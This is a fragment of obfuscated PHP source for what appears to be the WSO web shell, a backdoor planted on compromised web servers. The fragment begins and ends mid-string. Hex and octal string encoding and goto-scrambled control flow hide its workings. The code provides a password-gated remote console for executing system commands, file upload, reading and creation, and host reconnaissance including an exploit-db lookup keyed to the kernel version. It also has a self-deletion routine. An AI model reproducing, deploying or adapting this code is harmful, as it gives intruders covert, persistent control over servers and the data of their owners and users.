64\151\156\147\72\65\160\170\x3b\x6d\141\x72\147\x69\x6e\x3a\x30\x3b\x6f\166\x65\162\x66\154\157\x77\x3a\40\141\x75\164\157\x3b\x20\x7d\15\12\x2e\x62\x69\147\141\162\x65\141\173\40\x77\x69\x64\x74\x68\72\x31\60\60\45\x3b\x68\145\151\x67\150\x74\72\63\60\60\160\170\x3b\x20\175\xd\xa\x69\156\x70\x75\164\x2c\164\x65\170\x74\141\162\x65\x61\54\163\145\154\x65\x63\x74\173\x20\x6d\141\x72\147\151\x6e\72\60\73\x63\157\154\x6f\162\x3a\43\x66\146\146\73\142\141\143\x6b\147\162\x6f\x75\x6e\144\55\x63\x6f\x6c\157\x72\x3a\x23\65\65\x35\x3b\142\157\x72\x64\145\x72\x3a\61\160\x78\40\x73\157\x6c\151\144\40{$color}\x3b\x20\x66\157\156\164\72\x20\x39\x70\164\40\115\x6f\156\157\x73\160\141\x63\145\x2c\47\103\157\x75\162\151\145\x72\40\116\x65\167\x27\73\40\175\xd\12\x66\157\162\155\x7b\40\155\141\x72\x67\x69\x6e\x3a\x30\160\170\73\x20\x7d\15\xa\43\164\x6f\x6f\154\163\124\x62\154\x7b\x20\x74\x65\170\x74\x2d\141\x6c\x69\147\156\72\143\145\x6e\x74\145\162\73\40\x7d\15\xa\56\164\157\x6f\x6c\163\111\x6e\160\173\x20\167\x69\144\164\150\72\x20\63\x30\60\x70\x78\x20\175\15\xa\56\x6d\x61\x69\x6e\x20\x74\x68\173\x74\145\170\164\55\141\x6c\x69\x67\x6e\72\154\x65\146\164\73\x62\141\x63\x6b\147\162\x6f\165\156\144\55\x63\x6f\154\157\162\x3a\43\x35\145\65\x65\x35\x65\73\x7d\xd\xa\56\x6d\141\151\156\40\164\162\72\150\157\166\x65\x72\173\x62\141\143\x6b\x67\x72\x6f\x75\x6e\144\x2d\143\x6f\154\x6f\x72\72\x23\x35\x65\65\145\65\x65\x7d\15\12\x2e\154\x31\173\142\x61\143\x6b\x67\x72\x6f\x75\156\144\x2d\143\157\x6c\x6f\x72\72\43\x34\x34\64\175\15\xa\x2e\x6c\x32\173\x62\141\x63\153\x67\x72\157\x75\156\x64\x2d\x63\x6f\154\x6f\162\x3a\43\x33\63\63\x7d\xd\12\160\162\145\173\146\157\x6e\164\x2d\x66\141\x6d\x69\154\171\72\x43\157\165\162\151\x65\162\x2c\115\157\x6e\157\163\x70\x61\x63\x65\x3b\175\15\12\74\57\163\164\x79\154\145\x3e\15\xa\x3c\x73\x63\x72\x69\x70\164\76\15\xa\40\40\40\40\166\x61\x72\x20\x63\x5f\40\x3d\x20\x27" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\x27\x3b\xd\xa\x20\40\x20\x20\x76\141\x72\40\141\137\40\x3d\x20\x27" . htmlspecialchars(@$_POST["\x61"]) . "\x27\xd\12\40\40\x20\x20\x76\141\x72\40\143\x68\141\162\x73\145\164\137\40\x3d\x20\47" . htmlspecialchars(@$_POST["\x63\150\x61\x72\x73\x65\164"]) . "\47\x3b\xd\12\x20\x20\40\x20\166\x61\162\40\x70\x31\x5f\x20\75\40\x27" . (strpos(@$_POST["\x70\x31"], "\12") !== false ? '' : htmlspecialchars($_POST["\x70\61"], ENT_QUOTES)) . "\47\x3b\15\12\x20\x20\x20\40\166\x61\162\40\160\62\137\x20\75\40\47" . (strpos(@$_POST["\x70\62"], "\12") !== false ? '' : htmlspecialchars($_POST["\x70\x32"], ENT_QUOTES)) . "\47\73\xd\xa\x20\40\40\x20\166\141\162\40\160\x33\137\40\75\x20\47" . (strpos(@$_POST["\160\x33"], "\xa") !== false ? '' : htmlspecialchars($_POST["\160\x33"], ENT_QUOTES)) . "\x27\73\15\12\40\40\x20\x20\166\x61\x72\40\144\x20\x3d\40\144\x6f\x63\165\x6d\145\x6e\164\73\xd\xa\x9\x66\165\x6e\x63\x74\151\x6f\x6e\x20\x73\145\x74\50\141\54\143\x2c\160\61\54\x70\x32\x2c\160\63\54\143\x68\x61\162\163\145\164\x29\x20\173\15\xa\11\x9\151\146\50\141\x21\75\x6e\165\x6c\x6c\x29\144\56\x6d\x66\x2e\141\56\166\141\x6c\165\145\75\x61\x3b\x65\x6c\163\x65\x20\144\56\155\x66\x2e\x61\56\166\141\154\165\145\75\141\137\73\xd\xa\11\11\151\146\x28\143\x21\75\156\165\x6c\x6c\x29\x64\x2e\x6d\x66\56\143\56\x76\x61\154\165\145\x3d\x63\x3b\x65\x6c\x73\x65\x20\x64\x2e\155\146\56\143\56\166\141\154\165\145\75\143\x5f\x3b\15\12\11\11\x69\146\50\160\61\41\75\x6e\165\154\154\x29\x64\x2e\155\146\x2e\160\61\56\x76\141\x6c\165\145\75\160\x31\73\145\x6c\163\x65\x20\x64\x2e\155\x66\56\160\61\56\166\141\154\165\x65\75\x70\x31\x5f\73\15\xa\11\x9\x69\x66\x28\x70\62\41\75\x6e\165\154\x6c\x29\144\56\155\146\x2e\160\62\56\166\141\x6c\165\145\x3d\x70\x32\x3b\x65\x6c\x73\x65\x20\x64\56\x6d\146\x2e\160\x32\56\166\141\x6c\x75\x65\x3d\160\x32\x5f\73\xd\12\11\x9\x69\x66\x28\x70\63\x21\x3d\156\165\x6c\154\x29\144\56\155\x66\x2e\160\63\x2e\x76\141\x6c\x75\145\x3d\x70\63\x3b\x65\154\x73\x65\x20\144\56\x6d\146\x2e\160\63\x2e\166\141\x6c\x75\145\x3d\160\x33\x5f\x3b\15\xa\x9\x9\151\x66\50\143\150\141\x72\163\145\164\x21\x3d\x6e\165\x6c\154\51\x64\x2e\155\x66\x2e\x63\150\x61\162\163\145\164\56\166\141\x6c\x75\145\x3d\x63\x68\141\162\163\x65\164\x3b\145\154\163\145\x20\144\56\x6d\x66\x2e\x63\x68\141\162\x73\x65\x74\x2e\166\x61\154\165\145\x3d\x63\150\x61\162\163\145\164\x5f\73\xd\12\11\x7d\xd\xa\x9\x66\x75\156\x63\x74\x69\157\x6e\40\x67\50\141\54\143\x2c\160\61\x2c\x70\x32\54\160\63\x2c\x63\x68\x61\x72\x73\145\x74\x29\40\x7b\15\12\x9\11\163\x65\x74\50\x61\54\x63\x2c\160\61\x2c\160\x32\54\x70\63\x2c\143\x68\141\162\x73\x65\x74\x29\x3b\xd\xa\x9\11\x64\x2e\x6d\146\56\x73\x75\x62\x6d\x69\164\50\x29\73\xd\12\x9\175\xd\12\11\x66\x75\156\143\164\x69\157\x6e\40\x61\50\141\x2c\x63\54\x70\61\54\x70\x32\x2c\x70\x33\x2c\x63\150\x61\x72\x73\145\164\x29\x20\173\15\12\11\11\163\145\164\x28\x61\54\143\x2c\160\61\54\x70\62\x2c\x70\x33\x2c\143\150\x61\162\x73\x65\164\51\x3b\xd\xa\11\x9\166\x61\162\40\160\141\x72\141\x6d\163\x20\75\x20\x27\141\x6a\141\170\75\x74\x72\x75\x65\47\73\xd\xa\x9\x9\x66\157\x72\x28\151\75\60\73\151\x3c\x64\x2e\x6d\x66\x2e\x65\x6c\x65\155\x65\x6e\164\163\x2e\x6c\145\156\x67\164\150\73\x69\53\x2b\x29\15\xa\x9\11\x9\x70\x61\162\x61\155\x73\x20\53\75\40\47\46\x27\x2b\144\x2e\x6d\x66\56\x65\x6c\x65\155\145\x6e\x74\163\x5b\151\135\56\156\x61\x6d\x65\53\x27\75\x27\x2b\x65\x6e\x63\x6f\x64\145\x55\x52\x49\x43\157\155\160\x6f\156\145\156\x74\50\144\x2e\155\x66\x2e\x65\x6c\145\155\x65\156\164\163\133\x69\x5d\x2e\166\141\x6c\165\x65\51\73\xd\12\x9\x9\163\162\x28\x27" . addslashes($_SERVER["\x52\x45\x51\125\105\123\x54\x5f\x55\x52\x49"]) . "\47\x2c\40\160\x61\162\141\x6d\163\x29\73\15\xa\x9\x7d\xd\12\x9\x66\x75\x6e\x63\x74\151\x6f\x6e\40\163\x72\x28\x75\x72\154\x2c\40\160\141\x72\x61\x6d\x73\x29\x20\x7b\xd\12\11\x9\x69\x66\40\x28\x77\151\156\144\157\x77\x2e\130\115\x4c\x48\164\x74\160\x52\x65\161\x75\x65\x73\x74\x29\15\xa\11\x9\11\162\145\161\x20\x3d\x20\x6e\145\x77\40\130\x4d\114\x48\x74\x74\x70\122\145\161\165\145\163\x74\x28\x29\x3b\xd\12\x9\x9\x65\x6c\x73\145\x20\x69\x66\40\50\167\x69\156\144\x6f\167\56\101\x63\x74\x69\x76\145\130\117\142\152\x65\x63\x74\x29\xd\xa\x9\x9\11\x72\x65\161\40\x3d\x20\156\145\x77\40\x41\x63\164\x69\166\145\x58\x4f\142\152\x65\143\x74\50\47\115\x69\143\162\x6f\163\157\x66\x74\x2e\x58\x4d\114\110\x54\124\x50\x27\51\73\xd\12\40\x20\x20\x20\40\x20\40\x20\151\146\x20\x28\x72\x65\161\x29\40\173\xd\12\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x72\x65\x71\x2e\x6f\x6e\x72\145\141\144\x79\x73\x74\x61\x74\145\x63\x68\x61\x6e\x67\x65\40\x3d\40\x70\162\157\x63\145\163\x73\122\145\x71\103\x68\141\156\x67\x65\73\xd\xa\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\x72\145\161\56\x6f\x70\145\x6e\50\47\x50\117\123\124\47\54\x20\x75\162\154\x2c\x20\164\162\x75\145\51\73\15\xa\40\40\x20\x20\x20\40\40\x20\40\x20\x20\40\162\145\x71\56\x73\145\164\122\145\x71\x75\145\x73\x74\x48\145\x61\x64\145\162\40\50\x27\103\157\x6e\164\x65\156\x74\55\x54\x79\160\145\47\54\40\47\x61\x70\x70\154\x69\143\x61\x74\x69\157\156\x2f\170\55\167\x77\x77\55\x66\157\x72\x6d\55\x75\162\x6c\145\x6e\143\x6f\x64\x65\144\47\x29\x3b\xd\xa\x20\40\40\40\x20\x20\40\x20\40\x20\40\x20\x72\145\x71\56\x73\x65\156\x64\x28\160\141\162\x61\x6d\163\x29\73\xd\12\40\40\40\40\x20\40\40\40\x7d\15\xa\11\175\15\xa\x9\146\x75\156\143\164\x69\157\156\x20\x70\x72\x6f\143\x65\x73\163\122\x65\161\103\x68\141\x6e\147\145\x28\51\x20\x7b\15\12\11\11\x69\146\x28\x20\50\x72\x65\x71\x2e\162\145\141\x64\x79\123\x74\141\164\x65\x20\75\x3d\40\64\51\40\51\15\xa\11\x9\x9\151\146\50\x72\145\x71\56\x73\164\141\x74\x75\x73\40\x3d\x3d\x20\62\x30\x30\x29\40\173\xd\12\11\11\x9\x9\x76\x61\162\x20\x72\x65\147\x20\75\40\156\x65\167\x20\122\145\x67\105\x78\x70\50\42\50\134\134\144\53\x29\50\x5b\x5c\x5c\x53\134\x5c\x73\x5d\52\51\x22\54\x20\47\155\x27\51\73\xd\12\11\11\11\11\166\141\x72\x20\x61\x72\162\75\162\145\147\56\145\170\145\x63\x28\162\145\161\x2e\162\x65\x73\x70\x6f\156\x73\x65\x54\x65\170\164\x29\73\xd\12\11\11\x9\11\145\166\141\x6c\x28\141\x72\162\133\62\135\56\163\x75\x62\x73\x74\162\x28\x30\x2c\40\x61\162\x72\133\61\135\51\51\x3b\xd\xa\x9\x9\x9\175\x20\145\154\x73\145\x20\141\154\x65\x72\x74\50\47\x52\145\x71\x75\x65\163\164\40\x65\162\162\157\x72\41\x27\x29\x3b\15\xa\x9\175\15\12\74\57\x73\x63\x72\151\160\x74\76\15\xa\74\150\145\141\144\x3e\x3c\142\x6f\x64\x79\x3e\x3c\144\x69\x76\x20\x73\164\171\154\145\75\47\160\x6f\x73\151\x74\x69\157\x6e\x3a\141\142\x73\x6f\x6c\x75\x74\x65\x3b\167\151\144\164\x68\72\61\60\x30\x25\73\142\141\x63\153\x67\162\x6f\165\156\x64\55\143\x6f\154\x6f\x72\72\x23\x34\x34\64\x3b\x74\157\160\72\x30\73\x6c\x65\x66\x74\x3a\x30\x3b\47\76\15\12\74\x66\157\162\155\40\x6d\145\164\150\x6f\x64\75\x70\x6f\x73\x74\x20\156\x61\x6d\x65\75\x6d\146\40\163\164\x79\154\145\x3d\47\x64\151\x73\160\154\x61\171\x3a\x6e\157\156\x65\73\x27\x3e\xd\12\74\151\156\160\x75\164\40\164\x79\160\x65\x3d\150\x69\x64\144\145\x6e\40\x6e\141\155\145\75\x61\76\xd\12\74\x69\156\x70\x75\x74\40\164\171\160\x65\x3d\x68\151\144\144\x65\x6e\x20\x6e\x61\155\145\x3d\143\x3e\xd\12\x3c\151\156\160\x75\164\x20\164\x79\x70\x65\x3d\x68\x69\144\144\145\156\40\156\141\x6d\x65\x3d\160\61\76\15\xa\x3c\x69\x6e\x70\x75\x74\40\164\x79\160\x65\75\150\151\x64\144\145\156\x20\x6e\x61\155\145\75\x70\x32\76\xd\12\x3c\x69\156\x70\165\x74\x20\x74\171\160\x65\75\x68\151\x64\x64\145\156\x20\x6e\141\155\145\75\160\x33\x3e\15\xa\74\151\156\160\x75\x74\40\164\171\160\x65\x3d\150\x69\x64\144\x65\156\40\156\141\155\145\75\x63\x68\141\162\x73\x65\x74\x3e\xd\12\74\57\x66\x6f\162\155\x3e"; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["\143\167\144"]); goto XR0lk; mxXoN: $explink = "\150\x74\164\x70\72\57\57\145\x78\160\154\x6f\151\x74\55\144\142\56\143\157\x6d\57\x73\x65\141\162\143\x68\57\x3f\141\x63\x74\151\x6f\x6e\x3d\x73\x65\141\x72\143\150\46\x66\151\x6c\x74\145\162\x5f\144\x65\x73\x63\162\x69\160\x74\151\x6f\156\75"; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("\x73"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "\x3c\141\x20\150\x72\x65\x66\x3d\x27\43\x27\x20\157\x6e\x63\x6c\151\x63\x6b\75\x27\x67\x28\x22\x46\151\154\x65\163\x4d\141\x6e\x22\x2c\42"; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "\57"; } $cwd_links .= "\x22\51\47\76" . $path[$i] . "\57\74\57\x61\x3e"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["\x53\145\x6c\146\x20\x72\145\155\157\x76\x65"] = "\x53\x65\154\146\122\145\x6d\x6f\x76\145"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("\x2f", $GLOBALS["\143\167\x64"]); goto MFEdT; CGFSE: if (strpos("\114\x69\x6e\165\170", $kernel) !== false) { $explink .= urlencode("\x4c\151\x6e\165\x78\x20\113\x65\162\x6e\145\154\x20" . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . "\40" . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["\143\167\144"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "\74\164\x68\x20\167\151\144\x74\150\x3d\42" . (int) (100 / count($m)) . "\x25\x22\76\x5b\40\x3c\x61\x20\x68\x72\x65\x66\x3d\42\x23\42\40\157\156\x63\154\x69\x63\153\75\42\x67\x28\47" . $v . "\47\x2c\x6e\165\x6c\x6c\x2c\47\47\x2c\47\x27\54\47\47\51\x22\76" . $k . "\74\x2f\x61\x3e\40\135\x3c\57\164\150\76"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "\x3c\157\160\164\151\157\156\40\166\141\x6c\165\145\75\42" . $item . "\42\x20" . ($_POST["\143\x68\141\x72\x73\x65\164"] == $item ? "\163\x65\x6c\x65\143\x74\145\144" : '') . "\x3e" . $item . "\74\x2f\157\x70\164\151\x6f\156\76"; } goto M4wyI; dJUUJ: if ($GLOBALS["\157\163"] == "\x77\x69\x6e") { foreach (range("\x63", "\x7a") as $drive) { if (is_dir($drive . "\x3a\134")) { $drives .= "\74\x61\40\x68\162\x65\146\75\x22\43\x22\x20\157\x6e\143\154\151\x63\153\75\42\x67\x28\47\106\x69\x6c\145\163\115\141\x6e\x27\54\47" . $drive . "\x3a\57\x27\51\x22\76\x5b\x20" . $drive . "\x20\x5d\74\57\141\76\40"; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("\x72"); goto znu8e; oXY47: if (!function_exists("\160\157\x73\x69\170\137\147\x65\x74\x65\x67\151\x64")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "\77"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["\x75\x69\144"]; goto nZ1Iw; nZ1Iw: $group = $gid["\x6e\141\155\145"]; goto LgEQ1; LgEQ1: $gid = $gid["\x67\x69\x64"]; goto XEe3x; q9aTZ: $user = $uid["\156\141\x6d\x65"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("\160\157\x73\x69\x78\137\147\145\164\147\162\x67\151\x64") && strpos($GLOBALS["\x64\x69\163\141\142\x6c\x65\137\146\x75\156\x63\x74\151\157\x6e\163"], "\x70\x6f\x73\x69\170\x5f\x67\x65\164\147\x72\147\151\x64") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("\167\150\151\x63\x68\x20" . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("\163\x63\141\x6e\x64\151\x72")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["\x63\167\144"]) ? "\x20\74\146\157\156\164\x20\x63\157\154\157\162\x3d\x27\147\162\x65\145\156\47\76\50\x57\x72\151\x74\145\141\142\154\x65\x29\x3c\57\146\157\156\164\x3e" : "\40\x3c\x66\x6f\156\x74\x20\143\157\154\157\162\x3d\x72\x65\x64\76\x28\116\157\164\x20\167\x72\151\164\x61\142\154\145\51\74\57\x66\x6f\156\x74\x3e"; echo "\xd\xa\74\57\144\151\166\x3e\xd\12\x3c\164\141\x62\x6c\145\x20\143\154\x61\163\163\75\x69\x6e\146\x6f\40\151\x64\x3d\164\157\x6f\154\x73\124\x62\154\x20\143\145\x6c\154\160\141\x64\x64\151\x6e\147\x3d\x33\40\x63\145\154\154\163\160\x61\143\x69\156\147\75\60\40\x77\x69\144\164\150\x3d\61\60\x30\45\x20\x20\163\164\171\x6c\145\x3d\47\142\157\x72\144\x65\162\x2d\164\157\160\72\x32\160\x78\x20\x73\157\154\151\x64\40\43\63\63\63\x3b\x62\157\x72\144\x65\x72\55\x62\x6f\x74\x74\157\155\72\62\160\170\x20\x73\157\x6c\x69\144\40\x23\63\x33\x33\x3b\47\76\xd\xa\x9\x3c\x74\x72\76\15\12\x9\x9\74\164\144\x3e\74\x66\x6f\162\155\40\157\x6e\163\x75\x62\155\151\x74\x3d\47\x67\50\156\x75\154\x6c\x2c\x74\x68\x69\x73\56\x63\x2e\166\141\x6c\x75\145\x2c\42\42\x29\73\162\x65\164\165\162\156\x20\146\x61\154\163\145\x3b\47\x3e\x3c\x73\160\141\x6e\x3e\103\150\141\156\x67\145\40\x64\151\x72\72\x3c\57\x73\160\141\x6e\76\x3c\x62\162\76\74\151\x6e\x70\x75\x74\x20\143\154\x61\x73\163\75\47\x74\157\x6f\x6c\x73\111\x6e\160\47\40\x74\x79\x70\x65\x3d\x74\x65\170\164\40\x6e\x61\155\x65\x3d\x63\x20\166\x61\x6c\165\x65\x3d\x27" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\x27\x3e\74\151\156\x70\x75\164\40\x74\171\160\x65\x3d\x73\165\x62\155\151\164\40\x76\141\x6c\x75\145\x3d\x27\76\x3e\x27\76\74\57\x66\157\x72\155\76\x3c\x2f\x74\144\76\15\xa\11\x9\x3c\164\x64\76\74\x66\x6f\x72\x6d\40\x6f\156\x73\x75\142\x6d\151\164\75\42\147\50\47\106\151\154\145\163\x54\x6f\157\x6c\x73\x27\x2c\x6e\x75\154\154\x2c\x74\x68\151\163\x2e\146\x2e\166\x61\x6c\165\145\51\x3b\162\145\x74\165\162\156\x20\146\x61\154\x73\x65\x3b\42\76\x3c\x73\x70\141\x6e\x3e\122\x65\141\x64\x20\146\151\154\145\x3a\x3c\57\163\x70\141\156\x3e\74\142\162\76\74\x69\x6e\x70\165\x74\40\x63\154\141\163\x73\75\x27\164\157\157\x6c\x73\x49\x6e\x70\47\x20\x74\x79\160\x65\75\164\x65\x78\x74\x20\156\141\x6d\x65\75\x66\76\74\x69\156\x70\165\x74\40\x74\171\160\145\x3d\x73\x75\x62\155\151\164\x20\166\141\x6c\165\x65\x3d\x27\x3e\x3e\x27\x3e\74\x2f\146\x6f\162\155\76\x3c\57\x74\x64\76\xd\12\11\x3c\x2f\x74\x72\x3e\x3c\164\x72\x3e\15\xa\x9\11\74\164\x64\76\x3c\x66\157\x72\x6d\40\x6f\156\x73\165\142\155\x69\164\x3d\42\147\x28\47\x46\x69\154\145\163\115\x61\x6e\47\54\156\x75\x6c\x6c\x2c\x27\x6d\153\x64\x69\x72\47\x2c\x74\x68\x69\x73\56\x64\x2e\x76\141\154\165\145\51\73\162\x65\x74\165\162\x6e\40\x66\x61\x6c\x73\x65\x3b\x22\x3e\74\x73\160\141\x6e\x3e\x4d\141\x6b\x65\40\x64\151\x72\72\x3c\x2f\163\x70\x61\156\x3e{$is_writable}\74\142\x72\x3e\74\x69\156\160\165\x74\40\143\x6c\141\163\x73\x3d\x27\x74\x6f\x6f\x6c\x73\x49\x6e\x70\x27\40\x74\171\x70\145\x3d\164\x65\170\164\x20\x6e\141\155\x65\75\x64\76\x3c\x69\x6e\160\x75\x74\40\164\x79\160\x65\x3d\163\x75\142\155\x69\x74\40\x76\x61\x6c\165\x65\x3d\x27\76\76\x27\76\74\57\146\x6f\162\155\76\x3c\57\164\x64\x3e\15\12\11\11\x3c\x74\144\x3e\74\x66\x6f\x72\155\x20\157\156\x73\165\142\x6d\151\164\75\x22\x67\50\x27\x46\151\x6c\145\163\x54\157\x6f\154\x73\47\x2c\156\x75\x6c\x6c\x2c\164\x68\151\x73\x2e\x66\x2e\166\x61\x6c\x75\145\54\47\x6d\153\146\151\x6c\145\47\x29\73\x72\x65\x74\x75\162\x6e\x20\x66\x61\x6c\163\145\73\x22\x3e\74\x73\x70\x61\x6e\x3e\115\x61\153\x65\40\x66\151\x6c\145\x3a\x3c\x2f\x73\160\x61\156\76{$is_writable}\74\142\162\x3e\74\x69\x6e\x70\165\164\x20\143\x6c\x61\163\x73\75\47\164\157\x6f\x6c\x73\111\156\x70\47\x20\164\171\160\145\75\x74\145\x78\x74\x20\156\x61\x6d\x65\75\146\76\74\151\156\x70\x75\164\x20\x74\171\x70\145\x3d\163\x75\142\x6d\x69\x74\x20\166\141\x6c\165\x65\x3d\x27\x3e\76\47\76\74\57\146\x6f\162\x6d\x3e\74\x2f\164\144\x3e\15\xa\x9\x3c\x2f\x74\x72\76\x3c\x74\x72\x3e\xd\xa\11\11\x3c\164\144\x3e\74\146\x6f\x72\x6d\x20\x6f\156\x73\x75\x62\x6d\x69\x74\75\42\x67\50\47\103\157\156\x73\157\154\145\x27\x2c\x6e\x75\x6c\x6c\54\164\150\x69\x73\x2e\143\x2e\166\141\154\165\145\x29\x3b\x72\145\x74\x75\162\156\x20\x66\141\x6c\x73\145\x3b\x22\76\74\x73\160\x61\x6e\x3e\105\170\145\x63\x75\x74\145\72\74\x2f\163\160\x61\156\x3e\x3c\x62\x72\x3e\74\151\156\160\x75\x74\x20\143\154\x61\x73\163\x3d\47\164\157\x6f\x6c\163\x49\156\160\x27\x20\164\171\160\145\75\164\x65\170\164\40\156\141\x6d\x65\x3d\143\40\166\141\x6c\x75\x65\75\47\x27\x3e\x3c\151\156\x70\x75\x74\x20\x74\171\x70\145\75\163\x75\x62\x6d\151\x74\40\166\x61\x6c\x75\x65\x3d\47\x3e\76\x27\76\74\57\146\x6f\162\x6d\x3e\74\x2f\164\144\x3e\15\xa\11\11\x3c\x74\144\x3e\74\x66\x6f\162\x6d\x20\155\145\164\x68\157\144\75\47\x70\x6f\163\164\47\40\x45\116\103\x54\x59\120\x45\x3d\x27\x6d\x75\x6c\x74\151\160\x61\x72\x74\57\x66\157\x72\155\x2d\144\141\164\141\x27\76\15\xa\x9\x9\x3c\151\156\160\165\x74\x20\164\x79\x70\x65\75\150\151\x64\x64\145\x6e\x20\x6e\x61\155\145\75\x61\40\166\x61\154\165\x65\x3d\x27\x46\x69\154\145\x73\115\101\156\x27\76\15\12\x9\11\74\151\x6e\160\x75\164\x20\x74\171\x70\x65\x3d\150\x69\144\x64\x65\156\40\x6e\141\x6d\145\75\143\x20\x76\141\x6c\x75\145\75\47" . $GLOBALS["\x63\167\x64"] . "\47\x3e\xd\12\x9\11\74\x69\156\160\165\x74\40\164\x79\x70\145\75\x68\x69\x64\144\x65\156\x20\156\141\x6d\x65\x3d\x70\61\40\166\141\x6c\165\145\75\47\165\160\x6c\157\x61\144\x46\151\154\145\47\76\xd\12\x9\x9\74\151\x6e\160\165\164\40\164\171\x70\145\75\150\151\144\x64\145\156\40\x6e\141\155\x65\75\143\150\x61\162\163\x65\x74\x20\166\141\154\x75\x65\75\47" . (isset($_POST["\143\150\x61\x72\x73\145\164"]) ? $_POST["\x63\150\x61\162\163\145\164"] : '') . "\47\x3e\15\12\x9\x9\x3c\163\x70\141\156\x3e\x55\x70\154\x6f\141\144\40\x66\x69\154\x65\72\74\57\163\x70\x61\x6e\76{$is_writable}\x3c\x62\162\76\74\151\x6e\160\165\x74\40\x63\154\141\163\163\x3d\x27\x74\x6f\x6f\154\x73\111\156\160\x27\x20\164\171\160\x65\75\146\x69\x6c\145\x20\x6e\141\155\145\x3d\146\x3e\74\x69\x6e\x70\x75\164\x20\x74\x79\160\x65\x3d\x73\165\142\x6d\151\164\40\166\141\x6c\165\145\75\47\x3e\76\47\x3e\74\x2f\x66\157\162\155\x3e\74\142\162\40\40\76\74\x2f\x74\x64\76\15\12\x9\74\x2f\x74\162\x3e\74\57\164\x61\x62\154\x65\76\x3c\57\x64\151\166\76\74\x2f\142\x6f\144\x79\x3e\74\x2f\x68\164\x6d\154\76"; } goto XeOpc; Qn_9k: function wsoLogin() { die("\x3c\160\x72\145\x20\141\x6c\x69\x67\x6e\75\143\145\156\164\x65\x72\76\74\x66\x6f\162\155\x20\x6d\x65\x74\x68\x6f\144\x3d\x70\x6f\x73\x74\x3e\120\x61\x73\163\167\157\162\144\72\x20\74\x69\x6e\160\x75\x74\40\x74\171\160\145\75\160\141\x73\163\167\x6f\162\144\40\x6e\x61\155\145\75\160\x61\163\163\x3e\74\151\156\160\x75\164\x20\164\x79\160\x65\x3d\x73\x75\142\x6d\151\164\x20\166\141\x6c\x75\x65\75\x27\76\76\x27\x3e\x3c\57\x66\x6f\162\x6d\76\74\x2f\x70\162\145\76"); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["\160\x31"] != "\171\145\163") { wsoHeader(); } goto X7soZ; X7soZ: echo "\74\150\x31\76\x53\x75\x69\143\151\144\145\74\x2f\150\x31\x3e\x3c\144\151\x76\x20\143\x6c\x61\x73\163\x3d\143\x6f\x6e\x74\x65\x6e\164\x3e\x52\x65\x61\x6c\x6c\171\40\x77\141\156\x74\x20\x74\x6f\40\x72\x65\x6d\x6f\166\x65\40\164\150\x65\x20\x73\x68\x65\x6c\x6c\x3f\x3c\142\162\76\74\x61\x20\x68\162\145\x66\x3d\x23\40\x6f\156\x63\x6c\151\143\153\75\42\147\x28\x6e\165\x6c\154\x2c\156\x75\x6c\x6c\54\x27\171\x65\x73\x27\x29\x22\76\x59\x65\x73\74\57\141\x3e\74\x2f\144\151\166\x3e"; goto tsvXj; KQZY3: if ($_POST["\x70\61"] == "\171\145\x73") { if (@unlink(preg_replace("\x21\x5c\50\x5c\x64\53\x5c\x29\x5c\163\x2e\52\41", '', __FILE__))) { die("\x53\x68\145\x6c\154\x20\x68\141\163\x20\142\x65\145\156\40\162\145\x6d\x6f\x76\x65\144"); } else { echo "\165\x6e\x6c\151\x6e\153\x20\x65\162\162\157\162\x21"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["\160\x61\x73\163"]) && md5($_POST["\x70\141\x73\163"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["\x48\124\x54\x50\x5f\110\x4f\123\124"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["\x48\x54\x54\120\137\x48\x4f\123\x54"])]) || $_COOKIE[md5($_SERVER["\x48\124\x54\120\x5f\x48\117\x53\124"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("\45\x31\x2e\62\x66", $s / 1073741824) . "\40\107\x42"; } elseif ($s >= 1048576) { return sprintf("\45\x31\x2e\x32\x66", $s / 1048576) . "\x20\115\102"; } elseif 